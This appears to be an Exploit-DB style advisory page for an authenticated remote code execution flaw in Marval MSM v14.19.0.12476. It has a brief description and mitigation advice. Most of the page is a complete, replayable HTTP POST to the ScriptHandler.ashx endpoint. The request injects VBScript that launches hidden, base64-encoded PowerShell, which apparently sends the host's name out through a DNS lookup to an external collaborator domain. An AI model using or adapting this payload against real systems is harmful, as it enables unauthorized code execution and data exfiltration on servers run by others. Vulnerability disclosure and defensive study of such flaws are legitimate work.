Marval MSM v14.19.0.12476 - Remote Code Execution (RCE) (Authenticated)

vendor:

Marval MSM

by:

Momen Eldawakhly (Cyber Guy)

CVSS

CRITICAL

Remote Code Execution (RCE)

CWE

Product Name: Marval MSM

Affected Version From: v14.19.0.12476

Affected Version To: v14.19.0.12476

Patch Exists: NO

Related CWE:

CPE: a:marvalnorthamerica:msm:14.19.0.12476

Metasploit:

Other Scripts:

Platforms Tested: Windows

2022

Marval MSM v14.19.0.12476 – Remote Code Execution (RCE) (Authenticated)

The Marval MSM application version v14.19.0.12476 is vulnerable to remote code execution (RCE) when an authenticated user sends a specially crafted POST request to the ScriptHandler.ashx endpoint. By exploiting this vulnerability, an attacker can execute arbitrary code on the target system.

Mitigation:

To mitigate this vulnerability, it is recommended to update the Marval MSM software to the latest version available. Additionally, ensure that the application is only accessible to trusted users and implement proper access controls.

Source

Exploit-DB raw data:

# Exploit Title: Marval MSM v14.19.0.12476 - Remote Code Execution (RCE) (Authenticated)
# Date: 27/5/2022
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: https://www.marvalnorthamerica.com/
# Software Link: https://www.marvalnorthamerica.com/
# Version: v14.19.0.12476
# Tested on: Windows
# Detailed blog: https://cyber-guy.gitbook.io/cyber-guy/blogs/marval-msm-rce

POST /MSM_Test/RFP/Forms/ScriptHandler.ashx?method=ProcessScript&classPath=%2FMSM_Test%2FRFP%2FForms%2FScriptMaintenance.aspx&classMode=WXr8G2r3eh0wvNjbiIT6aYVgZATjWlaZW0UFQrQrcAku4qWefyYTUu%2BzULTTON0fQaLjNtnCW7VX%2Fj1rYPDpKKN%2F8HPLGRSpVbdvPaR4mPIrSr4Aj22VMuIDEkMTpPhoq3gX8p4TBir56GBTJcpLv1agwKPB%2BWI%2F2TlU%2FjQKzz0%3D HTTP/2
Host: MSMHandler.io
Cookie: ASP.NET_SessionId=arrsgikvbwbagdsvetfvphbu; appNameAuth=B3D1490922B24585684E139359F3BB93D8D92468A906B1FEA01EB4CF760A23DC90BF30327784677BBC00C5860C145602EF39BB9BEBB6A451E57DBF42C47B7D0CDE09F4CE15D2A5BEBFFCE5A7BFCF7DED8D8B17036F2BCE3DDA873B542EED614B9B42E4B5E4AA18BBE32CC0EB864E6825C898A2F465A42E871DF13F19845E171697D5E23688EAD29D3F6B221DBF18002DE5B929DBA88D42B4B518BC95F5BC5F3A3D36722F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: application/json, text/javascript, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 456
Origin: https://MSMHandler.io
Dnt: 1
Referer: https://MSMHandler.io/MSM_Test/RFP/Forms/ScriptMaintenance.aspx?id=3
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

type=%221%22&content=%22%5Cn%5CnFunction+Pwn()%5Cn++Set+shell+%3D+CreateObject(%5C%22wscript.Shell%5C%22)%5Cn%5Cn%5Cn++++shell.run+%5C%22powershell.exe+-nop+-w+hidden+-E+%5C%22%5C%22JAB2AGEAcgA9AGgAbwBzAHQAbgBhAG0AZQA7AG4AcwBsAG8AbwBrAHUAcAAgAGsAcgBmADUAbAB2AGYANABzAGUAdABtAGoAMgB2AG4AZABiADUAOQBsADQAdgBtAGcAZABtADUAawB0ADkALgAkAHYAYQByAC4AbwBhAHMAdABpAGYAeQAuAGMAbwBtAA%3D%3D%5C%22%5C%22%5C%22%5Cn%5Cn%5CnEnd+Function%5Cn%5CnPwn%22&id=%2226%22&isCi=true